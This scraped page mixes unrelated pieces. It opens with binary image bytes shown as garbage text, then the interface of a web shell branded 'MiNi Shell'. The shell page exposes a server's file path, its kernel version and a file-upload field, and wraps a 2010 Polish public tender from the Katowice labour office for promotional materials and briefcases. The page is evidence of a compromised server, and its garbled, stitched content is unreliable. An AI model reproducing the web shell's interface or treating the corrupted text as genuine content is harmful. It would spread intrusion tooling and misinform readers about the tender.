JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100722/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100722/196357-N-2010.html

<p class="kh_header"><b>Katowice: Zakup i dostawa materiałów promocyjnych dla Powiatowego Urzędu Pracy w Katowicach</b><br>
<b>Numer ogłoszenia: 196357 - 2010; data zamieszczenia: 22.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Katowicach , ul. Pośpiecha 14, 40-852 Katowice, woj. śląskie, tel. 032 2598263, faks 032 2599503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.katowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów promocyjnych dla Powiatowego Urzędu Pracy w Katowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1.
Zakup i dostawa materiałów promocyjnych: 
1.	Plakaty na Targi Pracy - 40 sztuk,
2.	Ulotki - 1000 sztuk,
3.	Zaproszenia na Targi Pracy - 50 sztuk,
4.	Podziękowania za udział w Targach Pracy - 60 sztuk,
5.	Teczki firmowe - 200 sztuk,
6.	Wizytówki - 500 sztuk,
7.	Kalendarze ścienne - 100 sztuk,
8.	Zakładka do książek- 300 sztuk,
9.	Długopisy reklamowe - 300 sztuk,
10.	Smycze reklamowe - 200 sztuk,
11.	Kubki reklamowe - 100 sztuk,
12.	Torba z tworzywa naturalnego - 300 sztuk,

Część 2. 
Zakup i dostawa teczek/aktówek A4 skórzanych - 20 szt. oraz zestawów - długopis i ołówek typu Parker lub równoważny- 20 sztuk.

Część 3. 
Zakup i dostawa teczek/aktówek A4 skóropodobnych lub ze skóry ekologicznej - 5 szt:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 18.93.90.00-0, 30.19.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Formularz ofertowy wraz z oświadczeniem Wykonawcy, że zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń-zgodnie z załącznikiem nr 1 do SIWZ. Jeżeli Wykonawca składa ofertę tylko na niektóre części przetargu to te części, na które nie składa oferty w formularzu ofertowym należy wykreślić lub opisać nie dotyczy.
2.	Opis zaproponowanych zestawów oraz teczek,aktówek wraz ze zdjęciem (dot. części 2 i 3).
3.	W przypadku Wykonawców działających wspólnie ubiegających się o zamówienie - dokument stwierdzający ustanowienie przez Wykonawców wspólnie ubiegających się o zamówienie pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia publicznego albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Katowicach
ul. Pośpiecha 14
40-852 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Katowicach
ul. Pośpiecha 14
40-852 Katowice
BIURO PODAWCZE.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekty współfinansowane ze środków Europejskiego Funduszu Społecznego pn. Twój pomysł na firmę - Działanie 6.2 PO KL Wsparcie oraz promocja przedsiębiorczości i samozatrudnienia, - Poddziałanie 6.1.2 Programu Operacyjnego Kapitał Ludzki  oraz pn. Eurokadry II - Poddziałanie 6.1.2 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup i dostawa materiałów promocyjnych:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Plakaty na Targi Pracy - 40 sztuk,
2. Ulotki - 1000 sztuk,
3. Zaproszenia na Targi Pracy - 50 sztuk,
4. Podziękowania za udział w Targach Pracy - 60 sztuk,
5. Teczki firmowe - 200 sztuk,
6. Wizytówki - 500 sztuk,
7. Kalendarze ścienne - 100 sztuk,
8. Zakładka do książek- 300 sztuk,
9. Długopisy reklamowe - 300 sztuk,
10. Smycze reklamowe - 200 sztuk,
11. Kubki reklamowe - 100 sztuk,
12. Torba z tworzywa naturalnego - 300 sztuk,
Ad. 1 Plakaty na Targi Pracy - 40 sztuk:
rozmiar A2, wielokolorowy, papier kredowy błysk o gramaturze min. 150 gm2,
tło stanowić muszą zdjęcia: Silesia City Center i lub Ronda Katowickiego od strony Chorzowa i lub Pomnika Powstańców Śląskich i lub siedziby Powiatowego Urzędu Pracy w Katowicach i lub Urzędu Miasta Katowice, 
na plakacie muszą być zamieszczone logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE, loga dwóch firm - współorganizatorów Targów Pracy,
dokładna treść, która będzie na plakacie zostanie podana po wyborze oferty.
Ad.2 Ulotki - 1000 sztuk:
rozmiar A4 składana na 3 części, wielokolorowa, papier kredowy błysk o gramaturze min. 130 gm2, obustronnie zadrukowana,na ulotce muszą być zamieszczone logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na ulotce zostanie podana po wyborze oferty.
Ad.3 Zaproszenia na Targi Pracy - 50 sztuk:
rozmiar: zamknięte 100 x 210 mm, otwarte 200 x 210 mm, wielokolorowe, papier ozdobny fakturowany o gramaturze min. 300 gm2,
Urząd zastrzega sobie prawo do korzystania z wzoru zaproszenia w wersji elektronicznej - do wysyłki drogą elektroniczną,
na zaproszeniu muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE, loga dwóch firm - współorganizatorów Targów Pracy,
dokładna treść, która będzie na zaproszeniu zostanie podana po wyborze oferty.
Ad. 4 Podziękowania za udział w Targach Pracy - 60 sztuk:
rozmiar A4, wielokolorowe, papier ozdobny fakturowany o gramaturze min. 300 gm2,
na podziękowaniu muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE, loga dwóch firm - współorganizatorów Targów Pracy,
dokładna treść, która będzie na podziękowaniu zostanie podana po wyborze oferty.
Ad. 5 Teczki firmowe - 200 sztuk:
tektura foliowana, format A-4, wielokolorowa, z kieszonką na wizytówkę, grzbiet 5 mm, gramatura min. 295 gm2, 
na teczce muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na teczce zostanie podana po wyborze oferty.
Ad. 6 Wizytówki - 500 sztuk:
tektura foliowana, wielokolorowa, gramatura min. 295 gm2, 
na wizytówce muszą być logotypy: logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na wizytówce zostanie podana po wyborze oferty.
Ad. 7 Kalendarze ścienne - 100 sztuk:
rozmiar B1, druk jednostronny, wielokolorowy, układ pionowy, papier kredowy błysk o gramaturze 170 gm2, miejsce na nadruk, metalowe listwy zaciskowe koloru srebrnego z dziurką do zawieszania, 
na kalendarzu muszą być umieszczone zdjęcia z obiektami miasta Katowic oraz logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na kalendarzu zostanie podana po wyborze oferty.
Ad. 8 Zakładka do książek - 300 sztuk
tektura foliowana, druk dwustronny, wielokolorowa, gramatura min. 295 gm2, 
na zakładce muszą być logotypy: logo PUP Katowice, logo Kapitału Ludzkiego, logo UE
po jednej stronie zakładki: mini kalendarz na 2011 rok, 
dokładna treść, która będzie na drugiej stronie zakładki zostanie podana po wyborze oferty.
Ad. 9 Długopisy reklamowe - 300 sztuk:
plastikowy z nadrukiem dwukolorowym, z mechanizmem automatycznym, wkład niebieski,
na długopisie muszą być logotypy: logo Kapitału Ludzkiego, logo UE.
Ad. 10 Smycze reklamowe - 200 sztuk:
jednobarwna z nadrukiem obustronnym, szerokość 15 mm, długość 90-95 cm, zakończona metalowym karabińczykiem,
na smyczy muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na smyczy zostanie podana po wyborze oferty.
Ad. 11 Kubki reklamowe - 100 sztuk:
jednobarwny ceramiczny z nadrukiem na zewnątrz, pojemność 300 ml,
na kubku muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE.
Ad. 12 Torba z tworzywa naturalnego - 300 sztuk:
płótno bawełniane 150 g, długość ucha 50 cm, wewnętrzne brzegi wykończone overlockiem, rozmiar 38 x 41 (z dnem 8-10 cm), kolor ecru, nadruk jednostronny,
na torbie muszą być logotypy: logo miasta Katowice, logo PUP Katowice, herb miasta Katowice, logo Kapitału Ludzkiego, logo UE,
dokładna treść, która będzie na torbie zostanie podana po wyborze oferty.
Wykonawca, którego oferta zostanie uznana za najkorzystniejszą po podpisaniu umowy i otrzymaniu od Zamawiającego niezbędnych materiałów, zobowiązany jest do przygotowania 3 projektów graficznych każdego z produktów, spośród których Zamawiający wybierze jeden..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup i dostawa teczek/aktówek A4 skórzanych - 20 szt. oraz zestawów - długopis i ołówek typu Parker lub równoważny- 20 sztuk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Teczki/aktówki A-4 skórzane - 20 sztuk:
2. Zestaw - długopis i ołówek typu Parker lub równoważny - 20 sztuk:

Ad. 1 Teczki/aktówki A4 skórzane - 20 sztuk:
- teczka/aktówka ze skóry naturalnej,
- teczka/aktówka zamykana na zamek lub posiadająca zamykaną klapę,
- odpinany pasek na ramię,
- dwa uchwyty (ewentualnie) wsuwane lub jeden uchwyt w przypadku teczki zamykanej klapą,
- posiadająca wewnątrz min. 2 przegrody głębokie i jedną zamykaną na suwak oraz miejsca na min. 2 długopisy, telefon komórkowy i małą wewnętrzną kieszonkę,
- kolor czarny,
- teczka/aktówka może posiadać jedną lub dwie zewnętrzne kieszenie zamykane klapą,
- gwarancja - min. 12 miesięcy.
Na teczce/aktówce musi znajdować się widoczny nadruk: logo Kapitału Ludzkiego, logo UE.

Ad. 2 Zestaw - długopis i ołówek typu Parker lub równoważny- 20 sztuk:
- zestaw długopis i ołówek typu Parker lub równoważny,
- zestaw musi być w pudełku bądź etui,
- na długopisie oraz ołówku musi znajdować się widoczny nadruk: logo Kapitału Ludzkiego, logo UE.
- gwarancja min. 12 miesięcy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.90.00-0, 30.19.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakup i dostawa teczek/aktówek A4 skóropodobnych lub ze skóry ekologicznej - 5 szt:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - teczka/aktówka zamykana na zamek od góry,
- dwa uchwyty,
- odpinany pasek na ramię,
- posiadająca wewnątrz min. 2 przegrody głębokie i jedną zamykaną na suwak oraz miejsca na min. 2 długopisy, telefon komórkowy i małą wewnętrzną kieszonkę,
- kolor czarny,
- teczka/aktówka może posiadać zewnętrzną kieszeń zamykaną klapą,
- gwarancja - min. 12 miesięcy.
Na teczce/aktówce musi znajdować się widoczny nadruk: logo Kapitału Ludzkiego, logo UE..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.93.90.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com